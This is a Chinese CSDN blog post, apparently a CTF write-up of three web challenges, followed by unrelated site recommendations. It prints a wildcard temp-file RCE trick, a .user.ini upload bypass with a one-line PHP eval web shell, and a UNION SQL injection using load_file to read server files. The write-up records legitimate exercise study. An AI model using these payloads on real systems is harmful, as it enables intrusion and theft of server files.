0X03

已于 2023-11-07 23:34:28 修改
阅读量276 收藏
点赞数
文章标签: mysql javascript 数据库
于 2023-11-07 22:47:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75005708/article/details/134230854
版权

红包题第二弹

看到源码里面的提示

7216322e08f04ad2adc874d7ce8f88f2.png

 ?cmd=phpinfo();

 看到源码

de0ed5edfa3c47a5a16a3d398eb55591.png

 kk

关键点就是有两个正则表达式

第一个

preg_match("/[A-Za-oq-z0-9$]+/",$cmd)

第二个

preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)

从第一个发现小写字母p没有被过滤掉,同时也是做了许多的过滤

是无字母数字RCE,并且不能用取反,异或,自增去绕过

因为过滤了~^,异或和取反都不用考虑了

其他师傅的做法

利用上传的临时文件去命令执行getshell

基本思路就是上传?,然后利用eval($cmd)去执行它。既然知道临时文件夹下的命名规则,也没有过滤通配符?,构造./??p/p?p??????就能读到这个文件。

点就相当于source

用来执行文件。source /home/user/bash 等同于 . /home/user/bash

问号?代表一个任意字符,通配符/??p/p?p??????匹配/tmp/phpxxxxxx

临时文件目录

php上传文件后会将文件存储在临时文件夹,然后用move_uploaded_file()
函数将上传的文件移动到新位置。临时文件夹可通过php.ini的upload_tmp_dir 指定,默认是/tmp目录。

规则

默认为 php+4或者6位随机数字和大小写字母,在windows下有tmp后缀,linux没有。比如windows下:phpXXXXXX.tmp
linux下:phpXXXXXX。

后面的就有点整不懂了

先放一放

web13

文件上传的窗口

先上传php文件看,出现报错

22f70b24af0e4fafb62d0ea9749bc6b8.png

访问upload.php

42540e0fb8934be397b9d0ab965044ef.png

是不是备份文件,这个备份文件是系统自己产生的

加上.bak,

<?php 
	header("content-type:text/html;charset=utf-8");
	$filename = $_FILES['file']['name'];
	$temp_name = $_FILES['file']['tmp_name'];
	$size = $_FILES['file']['size'];
	$error = $_FILES['file']['error'];
	$arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
	if ($size > 24){
		die("error file zise");
	}
	if (strlen($filename)>9){
		die("error file name");
	}
	if(strlen($ext_suffix)>3){
		die("error suffix");
	}
	if(preg_match("/php/i",$ext_suffix)){
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename)){
        die("error file name");
    }
	if (move_uploaded_file($temp_name, './'.$filename)){
		echo "文件上传成功!";
	}else{
		echo "文件上传失败!";
	}

 ?>

 拓展名只能读取一个,且不能为php,文件的大小要小于24字节,不能有php

先传入.user.ini,进行写入

auto_prepend_file=1.txt

 也就是后面传入的文件会以php的形式打开

传入1.txt

<?= @eval($_POST[1]);?>

 5037331b3c5c491982d28e34ead4e1a0.png

连接显示返回数据为空

c1fdf95c1a1c417dbf9fdb69954ece1c.png

 

 j检查一下,是已经上传成功的

c982f834fbf543fb9b6cfd79b87a720c.png

 glob() 函数返回匹配指定模式的文件名或目录

用函数看看目录下有什么文件

?a=print_r(scandir('.'));

 或者

/?a=print_r(glob("*"));

 59077fde00b944b5a11ab3f45cd4bdca.png

 尝试读取

?a=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");

 获取flag

web14

源代码直接显示

 <?php
include("secret.php");

if(isset($_GET['c'])){
    $c = intval($_GET['c']);
    sleep($c);
    switch ($c) {
        case 1:
            echo '$url';
            break;
        case 2:
            echo '@A@';
            break;
        case 555555:
            echo $url;
        case 44444:
            echo "@A@";
            break;
        case 3333:
            echo $url;
            break;
        case 222:
            echo '@A@';
            break;
        case 222:
            echo '@A@';
            break;
        case 3333:
            echo $url;
            break;
        case 44444:
            echo '@A@';
        case 555555:
            echo $url;
            break;
        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";
        case 1:
            echo '@A@';
            break;
    }
}

highlight_file(__FILE__);

 先可以尝试一下get

当我们输入c=3

ca2aea1f758a43348adafacf3e3f7752.png

刚开始的时候没有觉得什么奇怪的,后来想会不会是后面的文件路径

加上试一下

036d30afbabc4e2bb6c5d65a9bf0cf08.png

 4c85b5df1fd645b486855b287113922b.png

 看到新的登录框

在尝试一下admin的时候,发现URL里面出现一个新的参数query=admin

query=1和2还有3有回显加上字符就没有了,应该就是数字型注入了,并且过滤掉空格

刚刚里面出现过一文件secret.php

在index.php中包含了一个secret.php,先读这个文件试试

load_file函数可以轻松读取本地文件的全部或部分内容

eg:load_file('/home/user/test.txt');

?query=-1/**/union/**/select/**/load_file("/var/www/html/secret.php")#

 54ca573e919149bbba7cf02ef2880cca.png

 可以看到flag实际上是在:/real_flag_is_here,所以读这个文件

?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')

073848f07af9484088235f273653642a.png

 

 

 

 

 

 

 

 

 

 

芝诺的乌龟M
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c语言前缀0x十进制,0x03-数据和C
weixin_34237362的博客
05-22 2760
数据和C数据:数据类型和关键字c语言的基本数据类型和关键字K&C给出了7个于类型相关的关键字。C90标准添加了2个关键字,C99标准又添加了3个关键字最初K&C给出的关键字C90标准添加的关键字C99标准添加的关键字intsigned_Boollongvoid_Complexshort_Imaginaryunsignedcharfloatdouble在C语言中:int关键字:表示基...
ModbusTCP报文格式说明:功能码0X03
baishun000的博客
02-26 6186
Modbus由MODICON公司于1979年开发,是一种工业现场总线协议标准。1996年施耐德公司推出基于以太网TCP/IP的Modbus协议:ModbusTCP。 Modbus协议是一项应用层报文传输协议,包括ASCII、RTU、TCP三种报文类型。 标准的Modbus协议物理层接口有RS232、RS422、RS485和以太网接口,采用master/slave方式通信。 ModbusTCP的数据帧可分为两部分:MBAP+PDU。 报文头MBAP MBAP为报文头,长度为7字节,组成如下: 事务
java 0x03 和0x0a
keep12moving的博客
04-17 5961
0x03 和 0x0a是十六进制; 在java里使用时,代码如下: //分隔符和换行符 byte b1[]={0x03}; byte b2[]={0x0a}; String separator=new String(b1); String newlineCharacter=new String(b2); System.out.println("&&:"+sepa...
(char)0X03的问题
勇敢的心的网络笔记
12-15 5552
(char)0X03的问题 通过查找资料,0X03通常是文本结束的特征,像这个样子 ^C,我们通常需要将他替换掉,比如:msg = msg.replaceAll(String.valueOf((char) 0x03), ""); -----------------------------------------------------------------------
linux串口接收0x03等特殊字符的问题
youngyang的专栏
09-24 6683
近日在写一个linux的串口程序,发现大多数情况下数据接收没问题,但是有时却有问题。主要是接收的字符串中包含有0x03这个字符,会造成与它相邻的字符同时也接收不到,搞了好久才发现这个错误。查找资料后发现许多ARM板也存着这个问题,存在问题的字符串还包括0x13、0x0D等特殊含义的字符。 解决方法 方法比较简单,在接收数据前,对串口的文件描述符fd进行如下设置,  struct termio
QT环境下实现ModbusRTU以及ModBusTCP 支持功能码:0x01、0x03、0x0f、0x10
06-25
支持功能码:0x01、0x03、0x0f、0x10 适用人群,想了解Modbus协议的人,以及从事相关行业的人。了解了这个协议,对于学习其他协议如CAN,1533B等都非常容易,其实这些协议是原理都差不多,只是不同的协议他们约定的...
microPython中实现Modbus通信支持各类触摸屏功能码有0x01\0x02\0x03\0x04\0x05\0x06等功能码
12-06
microPython中实现Modbus通信支持各类触摸屏功能码有0x01\0x02\0x03\0x04\0x05\0x06等功能码
0x03-unity-ui
02-11
0x03。 Unity-用户界面任务任务0:记分板将您的0x02-unity-scripting存储库克隆到一个名为0x03-unity-ui的新存储库中。 与上一个项目一样,该项目应位于自己的存储库中,而不是子目录中。 创建一个新的Canvas ...
网易滑动 checkData V8 JavaScript 0x03
06-03
"网易滑动 checkData V8 JavaScript 0x03" 这个标题暗示了我们正在讨论一个与网易(中国知名的互联网科技公司)相关的项目,其中涉及到JavaScript的特定实现,可能是用于用户界面的滑动效果,而"checkData"可能是一...
易语言-网易滑动 checkData V8 JavaScript 0x03
06-25
在这个"易语言-网易滑动 checkData V8 JavaScript 0x03"的示例中,我们主要探讨的是如何使用易语言来实现与网易滑动验证相关的功能,以及与JavaScript的交互。 滑动验证是一种常见的网络安全机制,通常用于防止自动...
MySQL & NaviCat 安装及配置教程(Windows)【安装】
绯樱殇雪的博客
07-15 772
MySQL & NaviCat 安装及配置教程
MySQL中的内置函数
qhy850716的博客
07-15 439
一、时间函数 语法 函数 说明 current_date() 日期 current_time() 时间 current_timestamp() 时间戳 now() 当前时间 date(date_time) 取出时间中的日期 date_add(date, interval value_type) 时间相加,单位year, day, minute, second date_sub(date, interval value_type)
MySQL 进阶(三)【SQL 优化】
梦想是动物管理员
07-13 1269
MySQL SQL 优化
mysql链接错误,unblock with ‘mysqladmin flush-hosts‘“
java之书-资源
07-16 269
message from server: "Host '172.16.39.238' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'".
MySQL】8.复合查询
weixin_74113106的博客
07-12 669
MySQL复合查询
Mysql具体数据操作和表的约束(上)
SDU MATH
07-13 659
Mysql具体数据操作和表的约束
Mysql的insert批量插入性能问题
最新发布
m0_54123999的博客
07-17 157
同时分批插入也有数据一致性风险,如果在批次中途出现失败,部分数据可能已经插入,而部分数据可能未插入,需要额外处理数据一致性;当需要往数据库插入大量数据是,一条一条插入会导致插入时间长,性能不佳,所以我们一般会进行insert批量插入,一次性插入较大批次的数据,而不是每条记录单独插入,这通常会提高性能,因为批量操作减少了上下文切换和 SQL 解析的开销。事务期间,所有涉及的表或行会被锁定(根据具体的存储引擎),可能会导致更长时间的锁定,从而影响系统的并发性能,且资源占用高,大事务可能会占用较多的数据库资源。
基于SpringBoot+MySQL的租房项目+文档
欧阳小白闯天涯
07-11 1009
在当今快节奏的生活中,房屋租赁市场的需求与日俱增。为了有效管理租房流程、提升用户体验,本文基于SpringBoot+MySQL技术栈,设计并实现了一套全方位的租房系统。该系统融合了经纪人、维修员、管理员和用户四个角色,各自拥有独特的功能模块,包括房源管理、维修处理、员工用户管理、统计分析等。经纪人角色能够方便地添加房源、管理自己的房源、处理房源出租事务,并通过系统提供的月出租量统计功能进行业绩分析与优化。其次,维修员可以及时响应待处理的房源报修请求,有效地管理已处理的房源维修记录。
【Python进阶】正则表达式、pymysql模块
weixin_52854743的博客
07-14 1297
Python中正则表达式和Pymysql的概述和操作
dcm reload 0x03
07-29
根据提供的引用内容,dcm reload 0x03是一个命令,但是在提供的引用内容中没有找到与该命令相关的信息。请提供更多的上下文或详细说明,以便我能够更好地回答您的问题。 #### 引用[.reference_title] - *1* *2* *3* ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值